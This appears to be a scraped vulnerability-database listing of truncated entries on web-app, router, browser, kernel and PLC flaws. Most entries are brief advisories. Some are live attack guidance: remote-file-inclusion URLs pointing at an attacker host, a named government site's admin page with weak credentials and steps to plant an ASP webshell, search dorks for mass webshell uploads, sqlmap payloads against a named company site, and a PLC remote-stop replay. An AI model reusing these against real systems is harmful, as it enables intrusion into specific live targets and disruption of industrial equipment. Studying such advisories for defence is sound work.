PHP Helpdesk Login SQL Injection Vulnerability
PHP Helpdesk is a PHP-based web application. PHP Helpdesk does not properly filter user-supplied URI data; a remote attacker can exploit this to carry out SQL injection attacks and obtain sensitive information or unauthorized access to the application. The problem is that the login script lacks filtering of user-supplied parameters; by submitting a malicious SQL query as parameter data, authentication can be bypassed to gain unauthorized access to the application. PHP Helpdesk 0.6.16 No detailed solution is currently available: http://phphelpdesk.sourceforge.net/...
Wordpress Multiple Versions Pwnpress Exploitation Toolkit
No description provided by source. #!/usr/bin/env ruby .---. .---. : : o : happy antiblogging, dear kids! ..-: 0 : :-.. / .-'' ' ---' ---' " -. Copyright (c) Lance M. Havok .' " ' " . " . ' " . lmh at info-pull.com : '.---.,,.,...,.,.,.,..---. ' ; . " . .' " .' ----- All rights reserved.  ...
XOOPS Module icontent 1.0 Remote File Inclusion Exploit
No description provided by source. <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1254"><title>XOOPS Module icontent v.1.0 Remote File Inclusion Exploit</title><script language="JavaScript">...
MS Internet Explorer <= 7 Remote Arbitrary File Rewrite PoC (MS07-027)
No description provided by source. <html><title>MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification</title><body><OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0"></OBJECT><script language="vbscript"> //next script is converted to UTF16...
Joomla! PCLTar.PHP Remote File Inclusion Vulnerability
Joomla! is a PHP-based web application. Joomla! does not properly filter user-supplied input; a remote attacker can exploit this to execute arbitrary commands with web-server privileges. The problem is that the 'PCLTar.PHP' script lacks filtering of the user-supplied 'gpcltarlibdir' parameter; specifying a file on a remote server as the include parameter can lead to arbitrary command execution with web-server privileges. Joomla 1.5.0 Beta No solution is currently available: http://www.joomla.org/ http://www.example.com/libraries/pcl/pcltar.php?gpcltarlibdir=http://hacker/?...
SunOS 5.10/5.11 TELNET Service Remote Authentication Bypass Vulnerability
SunOS is a commercial UNIX operating system developed and maintained by Sun. The TELNET service in SunOS 5.10/5.11 has a vulnerability when handling malformed authentication data; a remote attacker may exploit it to bypass authentication and gain access. The SunOS 5.10/5.11 telnet daemon passes malformed parameters that a user may submit, unchecked, directly to the login process, which then performs an unintended user identity switch. This may allow a user to log in to the system with the privileges of certain privileged users without a password and obtain full system access; if the system does not restrict where the root user may log in from, obtaining root access is also possible. This vulnerability is currently being actively exploited. SunOS 5.11 SunOS 5.10 Temporary workaround:...
Texinfo File Handling Buffer Overflow Vulnerability
Texinfo is prone to a buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. Exploiting this issue allows attackers to cause the affected applications using Texinfo to crash, denying...
PhpNews Remote File Inclusion Vulnerability
PhpNews is a PHP-based news management program. PhpNews does not properly filter user-supplied URI data; a remote attacker can exploit this to execute arbitrary commands with the privileges of the web process. The problem is that multiple scripts lack filtering of the user-supplied 'Include' parameter; submitting a malicious remote server as the include target can lead to execution of arbitrary PHP code with web-process privileges. PHPNews PHPNews 1.0 No solution is currently available; please follow these links: http://newsphp.sourceforge.net/index.php http://www.example.com/Path/Include/lib.inc.php3?Include=http://cmd.gif?...
Mambatstaff MosConfig_Absolute_Path Remote File Inclusion Vulnerability
Mambatstaff is an application module based on Mambo. Mambatstaff does not properly filter user-supplied URI data; a remote attacker can exploit this to execute arbitrary commands with the privileges of the web process. The problem is that the 'mambatstaff.php' script lacks filtering of the user-supplied "mosConfig_absolute_path" parameter; submitting a malicious remote server as the include target can lead to execution of arbitrary PHP code with web-process privileges. Mambo Mambatstaff Component http://mamboxchange.com/projects/mambatstaff/...
3CTftpSvc TFTP Transfer Mode Remote Buffer Overflow Vulnerability
3CTftpSvc TFTP is a tftp server program. 3CTftpSvc TFTP does not properly handle an overly long transfer mode; a remote attacker can exploit this to carry out a buffer overflow attack and possibly execute arbitrary instructions with the privileges of the process. When an overly long transfer mode (more than 470 bytes) is passed to the "GET" or "PUT" command, a buffer overflow occurs; carefully crafted data may allow arbitrary instructions to be executed with process privileges. 3CTftpSvc TFTP Server 2.0.1 http://support.3com.com/software/utilitiesforwindows32bit.htm #!/usr/bin/python Buffer Overflow Long transporting...
AOL Instant Messenger AIM ""Away"" Message Remote Exploit
No description provided by source. /* CAN-2004-0636 */ /* AIM Away Message Buffer Overflow Exploit Exploit by John Bissell A.K.A. HighT1mes Exploit: ======== drizzit.c Vulnerable Software: ==================== - AIM 5.5.3588 - AIM 5.5.3590 Beta - AIM 5.5.3591 - AIM 5.5.3595 and a couple others...
Lanhai Zhuoyue (蓝海卓越) Billing Management System Arbitrary File Download
...
Apache OFBiz RCE Vulnerability (CVE-2021-26295)
...
DimonCoin(FUD), ERC20 token, allows attackers to steal all victim’s balances (CVE-2018–11411)
Abstract I found a vulnerability in a smart contract for DimonCoin (FUD), an Ethereum ERC20 token (CVE-2018–11411) [1]. This vulnerability is exactly the same as the UselessEthereumToken's vulnerability [2, 3]. The DimonCoin token also has the same vulnerable function, transferFrom, as the UET token. Therefore...
TP-Link TL-WR840N/TL-WR841N - Authentication Bypass
Title: TP-Link Multiple Router (TL-WR840N and TL-WR841N) Unauthenticated Router Access Vulnerability Author: BlackFog Team Date: 27 May 2018 Website: SecureLayer7.net Contact: [email protected] Version: 0.9.1 4.16 v0001.0 Build 170622 Rel.64334n Hardware: TL-WR841N v13 00000013 Version : Firmwar...
Telesquare SKT LTE Router SDT-CS3B1 WebDAV HTTP Methods Arbitrary File Events
Summary We introduce the SDT-CS3B1 LTE router, an SKT 3G and 4G LTE wireless-communication-based LTE router product. Description WebDAV is enabled with directory listing, and dangerous HTTP methods are allowed: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK and UNLOCK. The HTTP PUT metho...
Windows: Uninitialized variable in jscript!JsArraySlice(CVE-2017-11855)
There is an uninitialized variable vulnerability in jscript.dll. This issue could potentially be exploited through multiple vectors: - By opening a malicious web page in Internet Explorer. - (currently untested) An attacker on the local network could exploit this issue by posing as a WPAD Web Proxy...
MacOS/iOS kernel double free due to incorrect API usage in flow divert socket option handling(CVE-2017-13867)
SO_FLOW_DIVERT_TOKEN is a socket option on the SOL_SOCKET layer. It's implemented by flow_divert_token_set(struct socket *so, struct sockopt *sopt) in flow_divert.c. The relevant code is: error = soopt_getm(sopt, &token); if (error) goto done; error = soopt_mcopyin(sopt, token); if (error) goto done; ... done: if (token...
ZTE ZXDSL Configuration Reset
Vulnerability Summary The following advisory describes a configuration reset vulnerability found in ZTE ZXDSL 831CII version 6.2. ZXDSL 831CII is “an ADSL access device to support multiple line modes. It supports ADSL2/ADSL2+ and is backward compatible to ADSL, even offers auto-negotiation...
DblTek Multiple Vulnerabilities
Vulnerabilities summary The following advisory describes 2 (two) vulnerabilities found in the DblTek webserver. DBL is “specialized in VoIP products, especially GoIPs. We design, develop, manufacture, and sell our products directly and via distributors to customers. Our GoIP models now cover 1, 4, 8, 1...
wget HTTP integer overflow(CVE-2017-13089)
That’s an interesting vulnerability in GNU wget. According to the wget project, this was reported by Antti Levomäki, Christian Jalio, Joonas Pihlaja of Forcepoint as well as Juhani Eronen of the Finnish National Cyber Security Centre. The vulnerability is in src/http.c source code file and more...
Apple OS X Scene Kit DAE XML Code Execution Vulnerability(CVE-2016-1850)
SUMMARY An exploitable type confusion vulnerability exists in the handling of DAE images on OS X. A crafted DAE document can trigger a type confusion vulnerability which potentially could be exploited to achieve attacker controlled code execution. Vulnerability can be triggered via a saved DAE fi...
Safari 10 Cross-Origin Vulnerability
Safari 10's XMLHttpRequest, under a null origin, can freely initiate cross-origin requests and set HTTP headers. I submitted a bug report to Apple and emailed Apple; they quietly fixed the vulnerability themselves without even sending me an email, so I decided to publish the PoC. This is a screenshot I took before the vulnerability was fixed: This vulnerability allows a same-origin policy bypass, cross-origin at will. This is the code I wrote to fetch Gmail data: html var serveraddress = 'http://127.0.0.1:8000/static/csrfWcn6h/' function deleteSelf() { let test = document.getElementById('test')...
Lexmark LibISYSpdf Image Rendering DCTStream::getBlock() Code Execution Vulnerability(CVE-2017-2822)
Summary An exploitable code execution vulnerability exists in the image rendering functionality of Lexmark Perceptive Document Filters 11.3.0.2400. A specifically crafted PDF can cause a function call on a corrupted DCTStream to occur, resulting in user controlled data being written to the stack....
Microsoft Edge Security Bypass Vulnerability(CVE-2017-8637)
There is an issue in the Chakra JIT server that can be potentially exploited to compromise the JIT process from a compromised browser content process. Bugs like this could potentially be used to bypass ACG (Arbitrary Code Guard) in Microsoft Edge. The issue has been confirmed on a ChakraCore build from...
Foscam IP Video Camera Command Injection Vulnerability(CVE-2017-2847)
Summary An exploitable command injection vulnerability exists in the web management interface used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.37. A specially crafted HTTP request can allow for a user to inject arbitrary shell characters during manual network configurati...
Windows Kernel stack memory disclosure in win32k!NtGdiMakeFontDir(CVE-2017-8477)
We have discovered that the win32k!NtGdiMakeFontDir system call discloses large portions of uninitialized kernel stack memory to user-mode clients. The attached proof-of-concept code (which is specific to Windows 7 32-bit) works by first filling a large portion of the kernel stack with a controlled...
Windows Kernel stack memory disclosure in win32k!ClientPrinterThunk(CVE-2017-8475)
We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7 (other platforms untested), indirectly through the win32k!NtGdiOpenDCW system call. The analysis shown below was performed on Windows 7 32-bit. The full stack trace...
PlaySMs 1.4 'import.php' Remote Code Execution
Description Code Execution using import.php We know import.php accepts a file and just reads its content, which is not stored on the server. But when we stored our payload in backdoor.csv and uploaded it to the phonebook, it executed our payload and showed it on the next page in the NAME, MOBILE, Email, Group Code and Tags fields accordingly. ...
KDE kauth and kdelibs Logic Flaw Lets Local Users Obtain Root Privileges(CVE-2017-8422)
This document describes a generic root exploit against KDE. The exploit is achieved by abusing a logic flaw within the KAuth framework which is present in kde4 (org.kde.auth) and kde5 (org.kde.kf5auth). It is possible to spoof what KAuth calls callerIDs, which are in fact D-Bus unique names of the...
Google Nexus 9 SensorHub Firmware Downgrade Vulnerability(CVE-2017-0582)
Product: Google Nexus 9. Vulnerable Version: Nexus 9 Android builds before N4F27B (May 2017), i.e. before bootloader 3.50.0.0143. Mitigation: Install N4F27B or later (bootloader version 3.50.0.0143). Technical Details: The Nexus 9 device contains a SoC manufactured by Cywee which implements a “Sensor...
Heap Overflow Vulnerability in Citrix NetScaler Gateway (CVE-2017-7219)
After presenting my findings on the Swisscom router at the CybSecConference last year, I started looking for a new product to analyze. I quickly found that it’s possible to download virtual “demo” appliances of Citrix products, so I went on to download a Netscaler VPX, which at the time was at...
Zabbix Proxy Server SQL Database Write Vulnerability (CVE-2017-2825)
An official patch was issued earlier to fix the vulnerabilities: the Zabbix code execution vulnerability. DETAILS One of the Trapper requests made by the Zabbix proxy is the “proxy config” request, which allows a proxy to request its own proxy configuration from the Zabbix Server or any other Zabbix Proxy's...
Mozilla Firefox webkitdirectory local files disclosure (CVE-2017-5414)
I have reported three different bugs to Mozilla in the webkitdirectory feature. Luckily the folder picker was only implemented in Mozilla's Nightly browser, which is meant to test out new features before they land in the stable version. Bug 1295914 - webkitdirectory could be used to trick users into...
AVTECH video surveillance equipment authentication bypass and other vulnerabilities
Authentication bypass vulnerability There are two ways to achieve authentication bypass. The first one is the .cab way: the .cab file format is a video player plug-in stored in the web root directory; it may be accessed and downloaded directly, possibly without verification, and the device end only through the strst...
Wanhu (万户) ezOffice Collaborative Office Management Platform Voituregetsource.jsp svoitureid Parameter SQL Injection Vulnerability
No description provided by source...
TaoCMS v2.5Beta4 Comment.php Stored XSS Vulnerability (Can Hit the Backend)
No description provided by source...
E-TILLER Journal Editorial System POST Injection Vulnerability in 8 Locations Including /ch/reader/wait_published_articles.aspx
No description provided by source...
Zhengfang (正方) Educational Administration System jwggck.aspx fbsj Parameter SQL Injection Vulnerability
No description provided by source...
MetInfo 5.1.7 about/index.php Arbitrary File Inclusion Vulnerability (getshell)
No description provided by source...
Weaver (泛微) OA /iweboffice/officeserver.php Arbitrary File Upload getshell
No description provided by source...
Many SDCMS Sites Have Weak Passwords #Getshell Method
Brief description: as in the title. Details: Many SDCMS sites have weak passwords. Default backend admin/login.asp; weak passwords admin admin, admin admin888, sdcms sdcms, admin 123456. Picked a random government site http://www.qhxjcy.gov.cn/admin/ sdcms sdcms. In the backend choose Interface, then Template Management -> Manage Templates, select sdcmsindex.asp and insert an ASP one-liner. Visit http://www.qhxjcy.gov.cn/index.asp img...
kindeditor <= 4.1.5 File Upload Vulnerability
Vulnerability description: The vulnerability exists in the kindeditor editor; you can upload .txt and .html files, with php/asp/jsp/asp.net supported. The vulnerability exists in kindeditor 4.1.5 and earlier. Keywords: allinurl:/examples/uploadbutton.html allinurl:/php/uploadjson.php / .asp /...
FE Collaborative Office Platform /servlet/ChangeBGServlet Arbitrary File Upload Vulnerability
Vulnerable file: /servlet/ChangeBGServlet. Vulnerable parameter: skinName. Affected versions: FE 5.5.2 and below. Code snippet: public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String savePath = getServletConfig().getServletContext().getRealPath(""); String themeDir =...
Schneider Modicon PLC Packet Replay Remote Control (Start/Stop Command)
Schneider's Modicon series PLCs support control of the PLC through the Unity Pro software, including administrator-level operations such as program upload/download and starting/stopping the device. Communication between this software and the PLC has no encryption or authentication, so packet replay attacks are possible. Packet capture analysis: Remote shutdown of the device: Note: this attack is fairly easy to carry out with the following POC; it can make the remote PLC stop running directly, which may have serious consequences for the industrial environment where the target is located. The vulnerability can be verified with pocsuite; verification mode does not affect the device. It is recommended not to casually attempt the attack. Remember this.
JEECMS Generic Authorization Bypass, Part 4 (Orders Can Be Deleted/Cancelled)
Brief description: 111 Details: ID1 and ID2 each buy something they like, just no TT, what a pity -。- Let's change the ID and give ourselves a scare... We testers could go on Star Avenue; to quote Liu Qian, now is the moment to witness a miracle. White hats are all magicians -。- test7 cancels the order, then a delete button appears; delete, capture the packet, change the ID, send it, deleted successfully. Vulnerability proof: ID1 and ID2 each buy something they like, just no TT, what a pity -。- Let's change the ID and give ourselves a scare... We testers could go on Star Avenue; to quote Liu Qian, now is the moment to witness a miracle. White hats are all magicians -。-...
Coremail Official Website SQL Injection, Entire Database Readable
Brief description: The Coremail official site has an injection; there is protection, which can be bypassed. Details: Vulnerable URL: http://www.coremail.cn/gjzc2/list117.aspx?lcid=412 Vulnerability proof: There is protection; using sqlmap with tamper=chardoubleencode.py, it can be dumped. This is the payload sqlmap used: Place: GET Parameter: lcid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: lcid=412 AND...
phpems Configuration Flaw Allows Directly Adding an Administrator, Leading to getshell
Brief description: phpems's default uckey is 1234567890, so the UC encryption function can be used to encrypt malicious code and carry it into an SQL statement. Details: if (!defined('IN_UC')) { error_reporting(0); set_magic_quotes_runtime(0); defined('MAGIC_QUOTES_GPC') || define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc()); require_once 'config.inc.php'; $_DCACHE = $get = $post = array(); $code = @$_GET['code']; // code = encrypted code...
Enalean Tuleap 7.2 - XXE File Disclosure
No description provided by source. Vulnerability title: Tuleap = 7.2 External XML Entity Injection in Enalean Tuleap CVE: CVE-2014-7177 Vendor: Enalean Product: Tuleap Affected version: 7.2 and earlier Fixed version: 7.4.99.5 Reported by: Jerzy Kramarz Details: A multiple XML External Entity...
Xinyun (新云) CMS Site-Building System Has ewebeditor Upload and IIS Parsing Vulnerabilities, Allowing Mass getshell
Brief description: Details: The Xinyun CMS site-building system has ewebeditor upload and IIS parsing vulnerabilities, allowing mass getshell. Using the ewebeditor upload vulnerability, a folder named 1.asp can be created; combined with the IIS parsing vulnerability, a shell can then be obtained. A large number of vulnerable sites can be found via Google with the following keywords: inurl:Showservices.asp?id= inurl:showkbxx.asp?id= None...